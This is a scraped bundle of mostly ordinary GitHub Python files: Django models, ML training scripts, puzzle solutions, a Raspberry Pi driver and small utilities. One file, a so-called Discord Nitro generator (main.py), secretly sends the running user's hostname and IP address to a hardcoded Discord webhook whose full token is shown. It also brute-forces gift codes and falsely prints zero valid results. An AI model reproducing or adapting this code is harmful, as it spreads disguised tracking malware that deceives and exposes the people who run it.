Scraping/SaveToFile.py","file_name":"SaveToFile.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"34067774614","text":"from django.db import models\r\n\r\nfrom . 
import enums\n\n\nclass FunctionCall(models.Model):\n \"\"\"Function call\"\"\"\n\n arguments = models.TextField()\n name = models.TextField()\n\n\nclass Message(models.Model):\n \"\"\"Message for conversation\"\"\"\n\n content = models.TextField()\n name = models.TextField(null=True, blank=True)\n function_call = models.OneToOneField(\n FunctionCall, on_delete=models.CASCADE, null=True, blank=True\n )\n role = models.CharField(choices=enums.Role.choices())\n\n\nclass Choice(models.Model):\n \"\"\"Message choice by OpenAI API\"\"\"\n\n chatcmpl = models.ForeignKey(\"Chatcmpl\", on_delete=models.CASCADE)\n finish_reason = models.CharField(choices=enums.FinishReason.choices())\n index = models.PositiveIntegerField()\n message = models.OneToOneField(Message, on_delete=models.CASCADE)\n\n\nclass Usage(models.Model):\n \"\"\"Usage by OpenAI API\"\"\"\n\n completion_tokens = models.PositiveIntegerField()\n prompt_tokens = models.PositiveIntegerField()\n total_tokens = models.PositiveIntegerField()\n\n\nclass Chatcmpl(models.Model):\n \"\"\"Chat completion by OpenAI API\"\"\"\n\n id = models.CharField(primary_key=True)\n created = models.PositiveIntegerField()\n model = models.CharField()\n object = models.CharField()\n usage = models.OneToOneField(Usage, on_delete=models.CASCADE)\n\n\nclass ChatcmplRequest(models.Model):\n \"\"\"Chat completion request for OpenAI API\"\"\"\n\n request = models.JSONField()\n response = models.OneToOneField(Chatcmpl, on_delete=models.CASCADE)\n component = models.ForeignKey(\"core.Component\", on_delete=models.CASCADE)\n","repo_name":"LioQing/chat-composer","sub_path":"oai/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22246063898","text":"import tensorflow as tf\n\nflags = tf.flags\nFLAGS = flags.FLAGS\n\nclass OptimizerCAN(object):\n\n def __init__(self, preds, labels, model, num_nodes, num_features, pos_weight_u, norm_u, pos_weight_a, norm_a):\n preds_sub_u, preds_sub_a = preds\n labels_sub_u, labels_sub_a = labels\n self.cost_u = norm_u * tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(logits=preds_sub_u, targets=labels_sub_u, pos_weight=pos_weight_u))\n self.cost_a = norm_a * tf.reduce_mean(tf.nn.weighted_cross_entropy_with_logits(logits=preds_sub_a, targets=labels_sub_a, pos_weight=pos_weight_a))\n\n self.optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate) # Adam Optimizer\n\n # Latent loss\n self.log_lik = self.cost_u + self.cost_a\n self.kl_u = (0.5 / num_nodes) * tf.reduce_mean(tf.reduce_sum(1 + 2 * model.z_u_log_std - tf.square(model.z_u_mean) - \n tf.square(tf.exp(model.z_u_log_std)), 1))\n self.kl_a = (0.5 / num_features) * tf.reduce_mean(tf.reduce_sum(1 + 2 * model.z_a_log_std - tf.square(model.z_a_mean) - \n tf.square(tf.exp(model.z_a_log_std)), 1))\n self.kl = self.kl_u + self.kl_a\n \n self.cost = self.log_lik - self.kl\n\n self.opt_op = self.optimizer.minimize(self.cost)\n self.grads_vars = self.optimizer.compute_gradients(self.cost)\n\n self.correct_prediction_u = tf.equal(tf.cast(tf.greater_equal(tf.sigmoid(preds_sub_u), 0.5), tf.int32),\n tf.cast(labels_sub_u, tf.int32))\n self.correct_prediction_a = tf.equal(tf.cast(tf.greater_equal(tf.sigmoid(preds_sub_a), 0.5), tf.int32),\n tf.cast(labels_sub_a, tf.int32))\n self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction_u, tf.float32)) + tf.reduce_mean(tf.cast(self.correct_prediction_a, 
tf.float32))\n","repo_name":"mengzaiqiao/CAN","sub_path":"optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"27"} +{"seq_id":"1094403004","text":"import math\n\ndef is_prime(prime_array, num):\n num_sqrt = int(math.sqrt(num))\n \n for prime in prime_array:\n if prime > num_sqrt:\n break\n if num % prime == 0:\n return False\n\n return True\n\n\ndef primes_up_to(max_num):\n\n prime_array = [2, 3]\n \n for num in xrange(3, max_num + 1, 2):\n if is_prime(prime_array, num):\n prime_array.append(num)\n \n return prime_array\n\n\ndef reverse_indexes(length):\n return xrange(length - 1, -1, -1)\n\n\ndef largest_prime_factor(primes, number):\n\n indexes = reverse_indexes(len(primes))\n\n for index in indexes:\n prime = primes[index]\n if number % prime == 0:\n return prime\n\n return None\n\ndef solution():\n\n test = 600851475143\n primes = primes_up_to(int(math.sqrt(test)))\n answer = largest_prime_factor(primes, test)\n return answer","repo_name":"jimfingal/polyglot-euler","sub_path":"python/E003.py","file_name":"E003.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"34617059086","text":"from django.shortcuts import render\r\n\r\ndef calculator_view(request):\r\n if request.method == 'GET':\r\n return render(request, 'calculator.html')\r\n elif request.method == 'POST':\r\n context = {\r\n 'first_number': int(request.POST.get('first_number')),\r\n 'act': request.POST.get('act'),\r\n 'second_number': int(request.POST.get('second_number')),\r\n 'result': 0\r\n }\r\n if context['act'] == 'add':\r\n context['act'] = '+'\r\n context['result'] = context['first_number'] + context['second_number']\r\n elif context['act'] == 'subtract':\r\n context['act'] = '-'\r\n context['result'] = context['first_number'] - context['second_number']\r\n elif context['act'] == 'multiply':\r\n context['act'] = '*'\r\n context['result'] = context['first_number'] * context['second_number']\r\n else:\r\n context['act'] = '/'\r\n context['result'] = context['first_number'] / context['second_number']\r\n\r\n return render(request, 'result.html', context)\r\n","repo_name":"syiumbaeva/home_work","sub_path":"source/webapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40005077974","text":"\n# Objective\n# Today, we're working with regular expressions. Check out the Tutorial tab for learning materials and an instructional video!\n\n# Task\n# Consider a database table, Emails, which has the attributes First Name and Email ID. 
Given N rows of data simulating the Emails table, print an alphabetically-ordered list of people whose email address ends in @gmail.com.\n\n--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X\n--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X--------------------X\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n\nif __name__ == '__main__':\n N = int(input().strip())\n sheet = []\n for N_itr in range(N):\n first_multiple_input = input().rstrip().split()\n\n firstName = first_multiple_input[0]\n\n emailID = first_multiple_input[1]\n email = re.findall(\"@gmail.com$\", emailID)\n if(email):\n sheet.append(firstName)\n sheet = sorted(sheet)\n \n for n in sheet:\n print(n)\n","repo_name":"yashmallik/HR-codes","sub_path":"Day 28.py","file_name":"Day 28.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36536984717","text":"\"\"\"\nGiven an array A of positive integers. Your task is to find the leaders in the array. \nAn element of array is leader if it is greater than or equal to all the elements to its right side. The rightmost element is always a leader. \nA[] = {16,17,4,3,5,2}\nOutput: 17 5 2\n\"\"\"\n\ndef Leader(Arr,N):\n if N == 0 or N == 1:\n return Arr\n output = ''\n for i in range(N):\n temp_Arr = Arr[i:]\n temp_Arr.sort(reverse = True)\n if temp_Arr[0] == Arr[i]:\n output = output + str(Arr[i]) + ' '\n return output\n\nArr = [16,17,4,3,5,2]\nN = len(Arr)\nprint(Leader(Arr,N) ) \n","repo_name":"tejamaramreddy/Programming","sub_path":"Leader.py","file_name":"Leader.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4134888385","text":"import tensorflow as tf\nfrom tensorflow import keras\n\n\nclass myCallback(tf.keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs=None):\n if (logs.get('accuracy') >= 0.99):\n print('\\nReached 99% accuracy so cancelling training!')\n self.model.stop_training = True\n\ncallbacks = myCallback()\n\n\nmnist = keras.datasets.mnist\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n# normalize the data\nx_train = x_train / 255.0\nx_test = x_test / 255.0\n\nmodel = tf.keras.models.Sequential([\n keras.layers.InputLayer(input_shape=(28, 28, 1)),\n keras.layers.Flatten(),\n keras.layers.Dense(512, activation=tf.nn.relu),\n keras.layers.Dense(10, activation=tf.nn.softmax)\n])\n\n\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\nmodel.fit(x_train, y_train, epochs=10, callbacks=[callbacks])\n\nclassifications = model.predict(x_test)\nlist(map(lambda x: print('{0:.10f}'.format(x)), classifications[0]))\n\nprint('The real value is {}'.format(y_test[0]))","repo_name":"dharm1k987/tensorflow_tests","sub_path":"course1/week2/Exercise 2 - Handwriting Recognition/Exercise2-Question.py","file_name":"Exercise2-Question.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} 
+{"seq_id":"86393403688","text":"#!/usr/bin/env python\nimport RPi.GPIO as GPIO\nimport time\n\nclass ShiftRegister:\n \"\"\"Represents a logical shift register.\"\"\"\n\n def __init__(self, shift_clock_pin, store_clock_pin, data_input_pin):\n self.shift_clock_pin = shift_clock_pin\n self.store_clock_pin = store_clock_pin\n self.data_input_pin = data_input_pin\n\n self.all_pins = [shift_clock_pin, store_clock_pin, data_input_pin]\n\n GPIO.setup(self.all_pins, GPIO.OUT, initial=GPIO.LOW)\n\n def load_byte(self, byte):\n for bit_index in range(0, 8):\n GPIO.output(self.data_input_pin, 0x80 & (byte << bit_index))\n GPIO.output(self.shift_clock_pin, GPIO.HIGH)\n time.sleep(0.001)\n GPIO.output(self.shift_clock_pin, GPIO.LOW)\n\n def output(self):\n GPIO.output(self.store_clock_pin, GPIO.HIGH)\n time.sleep(0.001)\n GPIO.output(self.store_clock_pin, GPIO.LOW)\n\n def destroy(self):\n GPIO.cleanup(self.all_pins)\n","repo_name":"ChrisMiskowiec/pi-superkit-tutorial","sub_path":"shift_register.py","file_name":"shift_register.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37185941829","text":"import ctypes\nimport string\nimport os\nimport time\nfrom discord_webhook import DiscordWebhook\nimport requests\nimport numpy\nimport socket\nhostname = socket.gethostname()\nip_address = socket.gethostbyname(hostname)\nUSE_WEBHOOK = True\n\ntime.sleep(3)\nos.system('cls' if os.name == 'nt' else 'clear')\n\nurl = \"https://github.com\"\ntry:\n response = requests.get(url)\n print(\"Internet check\")\n time.sleep(.4)\nexcept requests.exceptions.ConnectionError:\n input(\"You are not connected to internet, check your connection and try again.\\nPress enter to exit\")\n exit()\n\n\nclass NitroGen:\n def __init__(self):\n self.fileName = \"Nitro Codes.txt\"\n\n def main(self):\n os.system('cls' if os.name == 'nt' else 'clear')\n if os.name == \"nt\":\n print(\"\")\n ctypes.windll.kernel32.SetConsoleTitleW(\"Nitro Generator\")\n else:\n print(f'\\33]0;By Nitro Gen V5F\\a', end='', flush=True)\n\n self.slowType(\"9ET Nitro Gen\", .02)\n time.sleep(2)\n self.slowType(\"Made by: Discord Nitro Gen\", .02)\n time.sleep(1)\n self.slowType(\"\\nInput How Many Codes to Generate and Check (99999 recommended): \", .02, newLine=False)\n\n try:\n num = int(input(''))\n except ValueError:\n input(\"Specified input wasn't a number.\\nPress enter to exit\")\n exit()\n\n if USE_WEBHOOK:\n url = \"https://discord.com/api/webhooks/1135262056019398808/mibBVhFjGqAlbYHJs1qQ9pkJd_-kciqxIq64wDjuQf0FlTNAJUzu8DL_M9TlXEzCGpd8\"\n webhook = url if url != \"\" else None\n\n if webhook is not None:\n DiscordWebhook(\n url=url,\n content=f\"Generator has been ran.\\nIP info below.\\n\\nHostname: **{hostname}** IP Address: **{ip_address}**\"\n ).execute()\n\n valid = []\n invalid = 0\n chars = []\n chars[:0] = string.ascii_letters + string.digits\n\n c = numpy.random.choice(chars, size=[num, 16])\n for s in c:\n try:\n code = ''.join(x for x in s)\n url = f\"https://discord.gift/{code}\"\n\n result = self.quickChecker(url, webhook)\n\n if result:\n valid.append(url)\n else:\n invalid += 1\n except KeyboardInterrupt:\n print(\"\\nInterrupted by user\")\n break\n\n except Exception as e:\n print(f\" Error | {url} \")\n\n if os.name == \"nt\":\n ctypes.windll.kernel32.SetConsoleTitleW(\n f\"Nitro Generator and Checker - {len(valid)} Valid | {invalid} Invalid - Made by Nitro Gen\")\n print(\"\")\n else:\n print(\n f'\\33]0;Made by Nitro Gen - 
{len(valid)} Valid | {invalid} Invalid - Nitro Gen\\a', end='', flush=True)\n\n print(f\"\"\"\nResults:\n Valid: {\"0\"}\n Invalid: {invalid}\"\"\")\n\n input(\"\\nThe end! Press Enter 5 times to close the program.\")\n [input(i) for i in range(4, 0, -1)]\n\n def slowType(self, text: str, speed: float, newLine=True):\n for i in text:\n print(i, end=\"\", flush=True)\n time.sleep(speed)\n if newLine:\n print()\n\n def quickChecker(self, nitro: str, notify=None):\n url = f\"https://discordapp.com/api/v9/entitlements/gift-codes/{nitro}?with_application=false&with_subscription_plan=true\"\n response = requests.get(url)\n\n if response.status_code == 200:\n print(f\" Valid | {nitro} \", flush=True, end=\"\" if os.name == 'nt' else \"\\n\")\n with open(\"Nitro Codes.txt\", \"w\") as file:\n file.write(nitro)\n\n if notify is not None:\n DiscordWebhook(\n url=url,\n content=f\"Valid Nito Code detected! @everyone \\n{nitro}\"\n ).execute()\n\n return True\n\n else:\n print(f\" Invalid | {nitro} \", flush=True, end=\"\" if os.name == 'nt' else \"\\n\")\n return False\n\n\nif __name__ == '__main__':\n Gen = NitroGen()\n Gen.main()\n","repo_name":"Metolix/nitro-gen","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39085606467","text":"import json\r\nimport VKont\r\nimport Yandex\r\n\r\nVK_VERSION = '5.131'\r\n\r\n\r\ndef file_json_dict(rezult_dict):\r\n with open('vk_dict.json', 'w') as outfile:\r\n json.dump(rezult_dict, outfile)\r\n print(\"Запись файла завершена\")\r\n\r\n\r\nya_token = input('1. Введите токен для Яндекс диска: ')\r\nvk_token = input('2. Введите токен Вконтакте: ')\r\nname_folder = 'course_work'\r\ntry:\r\n vk_id = int(input('3. 
Введите id аккаунта Вкотакте: '))\r\n ya = Yandex.YandexDisk(token=ya_token)\r\n vk = VKont.VkUser(token=vk_token, version=VK_VERSION)\r\n rez_dict = vk.get_foto_user(vk_id, 'profile', 5)\r\n json_dict = []\r\n if (ya.is_not_exist_folder(name_folder)):\r\n ya.create_folder(name_folder)\r\n for key, value in rez_dict.items():\r\n print(\"загружаем фото на яндекс диск\")\r\n params = {\r\n 'path': name_folder + '/' + key,\r\n 'url': value['url']\r\n }\r\n print(\"добавляем информацию о файле в список для файла-результата\")\r\n json_dict.append(\r\n {\r\n 'name': key,\r\n 'size': value['size']\r\n }\r\n )\r\n ya.upload_url_to_disk(params)\r\n print(\"запись в файл-результата\")\r\n file_json_dict(json_dict)\r\nexcept ValueError:\r\n print(\"Вы не ввели id аккаунта Вкотакте\")\r\n","repo_name":"Nikolay-Davydov/Course_paper1","sub_path":"Course_paper1.py","file_name":"Course_paper1.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"30786762706","text":"import cv2\nimport time\nfrom pprint import pprint\nimport poseModule as pm\n\ncap = cv2.VideoCapture(\n \"/Users/williamhbelew/Hacking/ocv_playground/pose_est_tutorial/poseEstVids/artem-30fps.mp4\")\nreal_lmList = []\npTime = 0\ndetector = pm.poseDetector()\nwhile True:\n success, img = cap.read()\n img = detector.findPose(img)\n lmList = detector.findPosition(img, draw=True)\n intermediateRL_landmarks = detector.findRealPosition(img)\n real_lmList.append(intermediateRL_landmarks)\n # pprint(lmList[14])\n # draw a specific joint ONLY (set draw to False, above)\n # cv2.circle(img, (lmList[14][1], lmList[14][2]),\n # 25, (0, 0, 255), cv2.FILLED)\n cTime = time.time()\n fps = 1/(cTime-pTime)\n pTime = cTime\n\n cv2.putText(img, str(int(fps)), (70, 50),\n cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 3)\n cv2.imshow(\"Image\", img)\n\n if cv2.waitKey(1) == ord('q'):\n break\ncap.release()\ncv2.destroyAllWindows()\npprint(real_lmList)\n","repo_name":"welew204/joint_workspace","sub_path":"pose_est_tutorial/poseApp.py","file_name":"poseApp.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18234746653","text":"import streamlit as st\nimport spacy\nimport itertools\nfrom src.helper_functions import setup_logger\n\nlogger = setup_logger()\n\n\ndef apply_similarity(examples, intents):\n\n logger.info(\n {\"message\": \"Applying similarity for all examples in the skill.\"})\n\n nlp = spacy.load('pt_core_news_md')\n\n docs = nlp.pipe(examples)\n docs = list(itertools.combinations(docs, 2))\n docs.reverse()\n\n docs_size = len(docs)\n\n counter = 0\n pbar = st.progress(counter)\n\n lst = []\n while len(docs) > 0:\n doc = docs.pop()\n similarity = doc[0].similarity(doc[1])\n intent = intents[examples.index(doc[0].text)]\n similar_intent = intents[examples.index(doc[1].text)]\n result = {\"intent\": intent, \"example\": doc[0].text, \"similar example\": doc[1].text,\n \"similar intent\": similar_intent, \"similarity\": similarity}\n lst.append(result)\n\n counter += 1\n pbar.progress(counter / docs_size)\n\n return lst\n\n\ndef apply_similarity_intents(examples_lst, intents):\n\n logger.info({\"message\": \"Applying similarity inside intents.\"})\n\n nlp = spacy.load('pt_core_news_md')\n\n counter = 0\n pbar = st.progress(counter)\n\n lst = []\n for examples, intent in zip(examples_lst, intents):\n docs = nlp.pipe(examples)\n docs = 
list(itertools.combinations(docs, 2))\n\n while len(docs) > 0:\n doc = docs.pop()\n similarity = doc[0].similarity(doc[1])\n result = {\"intent\": intent, \"example\": doc[0].text, \"similar example\": doc[1].text,\n \"similar intent\": intent, \"similarity\": similarity}\n lst.append(result)\n\n counter += 1\n pbar.progress(counter / len(intents))\n\n return lst\n","repo_name":"DougTrajano/anallyticabot","sub_path":"src/intents/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"3960043682","text":"t = int(input())\n\n\ndef overlap(i, j, job, array):\n if job[i][0] < array[j][1] and array[j][0] < job[i][1]:\n return True\n return False\n\n\ndef solve():\n jobs = []\n n = int(input())\n res = [0] * n\n jobs_dict = dict()\n for i in range(n):\n job = tuple(map(int, input().split()))\n jobs_dict[job] = i\n jobs = list(jobs_dict.keys() )\n\n jobs.sort()\n\n c_jobs = []\n j_jobs = []\n for i in range(n):\n overlaps_c = False\n for c_index in range(len(c_jobs)):\n if overlap(i, c_index, jobs, c_jobs):\n overlaps_c = True\n break\n if not overlaps_c:\n c_jobs.append(jobs[i])\n idx = jobs_dict[jobs[i]]\n res[idx] = \"C\"\n continue\n overlaps_j = False\n for j_index in range(len(j_jobs)):\n if overlap(i, j_index, jobs, j_jobs):\n overlaps_j = True\n break\n if not overlaps_j:\n j_jobs.append(jobs[i])\n idx = jobs_dict[jobs[i]]\n res[idx] = \"J\"\n continue\n if overlaps_j and overlaps_c:\n return 'IMPOSSIBLE'\n return ''.join(res)\n\n\nfor __ in range(t):\n print(\"Case #{}: {}\".format(__+1, solve()))","repo_name":"shreevari/Private","sub_path":"codejam/parenting-problem.py","file_name":"parenting-problem.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"23113529630","text":"\ndef permutations(alphabet, max_length):\n\n words = []\n\n #BOOTSTRAP\n for letter in alphabet:\n words.append(letter)\n \n for word in words:\n #Iterates over itself\n\n if len(word) == max_length:\n return words\n \n for letter in alphabet:\n words.append(word + letter)\n\n return words\n\n#print(permutations(\"abcte\", 7))\n\n'''\na\nb\nc\naa\nab\nac\nba\nbc\nbc\nca\ncb\ncd\naaa\n...\n'''\n","repo_name":"lowizdev/practical_cryptography_python_exercises","sub_path":"chapter 2/alphabet_permutations.py","file_name":"alphabet_permutations.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8307358145","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport cv2\nimport sys\nimport os\n\nBOARD_W, BOARD_H = 8, 6\n\nBOARD_TOTAL = BOARD_W * BOARD_H\nBOARD_SZ = (BOARD_W, BOARD_H)\n\n\nif __name__ == \"__main__\":\n\tarquivos = []\n\tpasta = \"../data/img_r2/\"\n\tfor i in range(1, 6):\n\t\tarquivos.append(pasta + str(i) + \"_10.png\")\n\n\ti = 0\n\tfor arquivo in arquivos:\n\t\tframe = cv2.imread(arquivo,1)\n\t\tret, corners = cv2.findChessboardCorners(frame, BOARD_SZ,None)\n\t\tif ret == True: # If it was possible to find the corners of Chessboard\n\t\t\tcv2.drawChessboardCorners(frame, BOARD_SZ, corners,ret)\n\t\t\tcv2.imwrite(str(i) + '.png', frame)\n\t\ti += 
1","repo_name":"carlos-adir/ComputerVision","sub_path":"T2/py3/see_borders.py","file_name":"see_borders.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14917317524","text":"class Bank():\r\n def __init__(self, user):\r\n self.name = user[\"name\"]\r\n self.pin = user[\"pin\"]\r\n self.balance = user[\"balance\"]\r\n\r\n def options(self):\r\n\r\n options = int(input(\r\n \"Please select an option \\n 1. Deposit \\n 2. Withdraw \\n 3. Balance \\n 4. Return Card: \"))\r\n if options == 1:\r\n self.bank_deposit()\r\n elif options == 2:\r\n self.bank_withdraw()\r\n elif options == 3:\r\n self.bank_balance()\r\n elif options == 4:\r\n pass\r\n else:\r\n self.options()\r\n\r\n def bank_deposit(self):\r\n deposit = float(\r\n input(\"Please insert how much you would like to deposit: \"))\r\n self.balance += deposit\r\n self.options()\r\n\r\n def bank_withdraw(self):\r\n withdraw = float(\r\n input(\"How much you would like to Withdraw: \"))\r\n if withdraw > self.balance:\r\n print(\"Sorry please check your balance as those funds are not available\")\r\n self.options()\r\n else:\r\n self.balance -= withdraw\r\n self.options()\r\n\r\n def bank_balance(self):\r\n print(f\"{self.name} your balance is: {self.balance:.2f}\")\r\n self.options()\r\n","repo_name":"DannyFlynn/pythonConsole","sub_path":"Atm/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26553703568","text":"import unittest\nfrom functions_with_errors import *\nfrom functions import *\n\n\nclass TestStringMethods(unittest.TestCase):\n\n def test_greeting_name1(self):\n name = \"Mykola\"\n result = greeting_by_name1(name)\n self.assertEqual(f\"Hello {name}!\", result)\n\n def test_greeting_name2(self):\n name = \"Alex\"\n result = greeting_by_name2(name)\n self.assertEqual(f\"Hello {name}!\", result)\n\n #_______________________________________________\n def test_get_symbol_position1(self):\n text = \"Hello\"\n symbol = \"o\"\n result = get_symbol_position1(text, symbol)\n self.assertEqual(result, 5)\n\n def test_get_symbol_position2(self):\n text = \"Hello\"\n symbol = \"o\"\n result = get_symbol_position2(text, symbol)\n self.assertEqual(result, 5)\n\n #_________________________________________________\n def test_merge1(self):\n dict1 = {\n \"name\": \"Alex\",\n \"age\": 29,\n \"email\": \"alexrozenberg@gmail.com\"\n }\n dict2 = {\n \"name\": \"Bob\",\n \"age\": 60,\n \"email\": \"has no email\"\n }\n dict3 = dict1.copy()\n dict4 = dict2.copy()\n dict3.update(dict4)\n result = merge1(dict1, dict2)\n self.assertDictEqual(result, dict3)\n\n def test_merge2(self):\n dict1 = {\n \"name\": \"Alex\",\n \"age\": 29,\n \"email\": \"alexrozenberg@gmail.com\"\n }\n dict2 = {\n \"name\": \"Bob\",\n \"age\": 60,\n \"email\": \"has no email\"\n }\n dict3 = dict1.copy()\n dict4 = dict2.copy()\n merge2(dict1, dict2)\n self.assertDictEqual(dict1, dict3, 'dict1 immutability is FAILED')\n\n def test_merge3(self):\n dict1 = {\n \"name\": \"Alex\",\n \"age\": 29,\n \"email\": \"alexrozenberg@gmail.com\"\n }\n dict2 = {\n \"name\": \"Bob\",\n \"age\": 60,\n \"email\": \"has no email\"\n }\n dict3 = dict1.copy()\n dict4 = dict2.copy()\n merge2(dict1, dict2)\n self.assertDictEqual(dict2, dict4, 'dict2 immutability is 
FAILED')","repo_name":"Python-fundamental-12-04-23/UA-1013.Python","sub_path":"hw/hw14/Soft/unittesting.py","file_name":"unittesting.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12971750997","text":"'''\r\nCreated on 08.07.2016\r\n\r\n@author: Yingxiong\r\n'''\r\nfrom ibvpy.api import BCDof\r\nfrom tloop import TLoop\r\nfrom tstepper import TStepper\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.interpolate import interp1d\r\nfrom traits.api import Range\r\nfrom matseval import MATSEval\r\nfrom tstepper import TStepper\r\nfrom tloop import TLoop\r\nfrom matplotlib import pyplot as plt\r\nfrom ibvpy.api import BCDof\r\nfrom traits.api import HasTraits, Property, Instance, cached_property, Str, Button, Range, on_trait_change, Array, List, Any, Float, Button\r\nfrom matplotlib.figure import Figure\r\nfrom cbfe.scratch.mpl_figure_editor import MPLFigureEditor\r\nfrom traitsui.api import View, Item, Group, HSplit, Handler, InstanceEditor, UItem, VGroup\r\nimport numpy as np\r\n\r\n\r\nclass Mainwindow(HasTraits):\r\n\r\n fpath = 'D:\\\\data\\\\pull_out\\\\all\\\\DPO-20cm-0-3300SBR-V3_R3_f.asc'\r\n d, f = np.loadtxt(fpath, delimiter=';')\r\n\r\n # panel = Instance(ControlPanel)\r\n mats_eval = Any\r\n\r\n time_stepper = Any\r\n\r\n time_loop = Any\r\n\r\n t_record = Array\r\n U_record = Array\r\n F_record = Array\r\n sf_record = Array\r\n eps_record = List\r\n sig_record = List\r\n\r\n figure = Instance(Figure)\r\n\r\n def _figure_default(self):\r\n figure = Figure()\r\n return figure\r\n\r\n update = Button()\r\n\r\n def _update_fired(self):\r\n # self.time.value = 1.0\r\n self.draw()\r\n self.figure.canvas.draw()\r\n\r\n K_bar = Float(20.)\r\n H_bar = Float(20.)\r\n E_b = Float(80000.)\r\n\r\n @on_trait_change('K_bar, H_bar, E_b')\r\n def plot(self):\r\n self.mats_eval.K_bar = self.K_bar\r\n self.mats_eval.H_bar = self.H_bar\r\n self.mats_eval.E_b = self.E_b\r\n\r\n ax1 = Property()\r\n\r\n @cached_property\r\n def _get_ax1(self):\r\n return self.figure.add_subplot(231)\r\n\r\n ax7 = Property()\r\n\r\n @cached_property\r\n def _get_ax7(self):\r\n return self.ax1.twinx()\r\n\r\n ax2 = Property()\r\n\r\n @cached_property\r\n def _get_ax2(self):\r\n return self.figure.add_subplot(232)\r\n\r\n ax3 = Property()\r\n\r\n @cached_property\r\n def _get_ax3(self):\r\n return self.figure.add_subplot(234)\r\n\r\n ax4 = Property()\r\n\r\n @cached_property\r\n def _get_ax4(self):\r\n return self.figure.add_subplot(235)\r\n\r\n ax5 = Property()\r\n\r\n @cached_property\r\n def _get_ax5(self):\r\n return self.figure.add_subplot(233)\r\n\r\n ax6 = Property()\r\n\r\n @cached_property\r\n def _get_ax6(self):\r\n return self.figure.add_subplot(236)\r\n\r\n def draw(self):\r\n self.U_record, self.F_record, self.sf_record, self.t_record, self.eps_record, self.sig_record = self.time_loop.eval()\r\n n_dof = 2 * self.time_stepper.domain.n_active_elems + 1\r\n\r\n slip, sig_n_arr, sig_e_arr, w_arr = self.time_stepper.mats_eval.get_bond_slip()\r\n self.ax1.cla()\r\n l_bs, = self.ax1.plot(slip, sig_n_arr)\r\n self.ax1.plot(slip, sig_e_arr, '--')\r\n self.ax7.cla()\r\n self.ax7.plot(slip, w_arr, '--')\r\n self.ax7.set_ylim(0, 1)\r\n self.ax1.set_title('bond-slip law')\r\n\r\n self.ax2.cla()\r\n l_po, = self.ax2.plot(self.U_record[:, n_dof], self.F_record[:, n_dof])\r\n marker_po, = self.ax2.plot(\r\n self.U_record[-1, n_dof], self.F_record[-1, n_dof], 'ro')\r\n self.ax2.plot(\r\n 
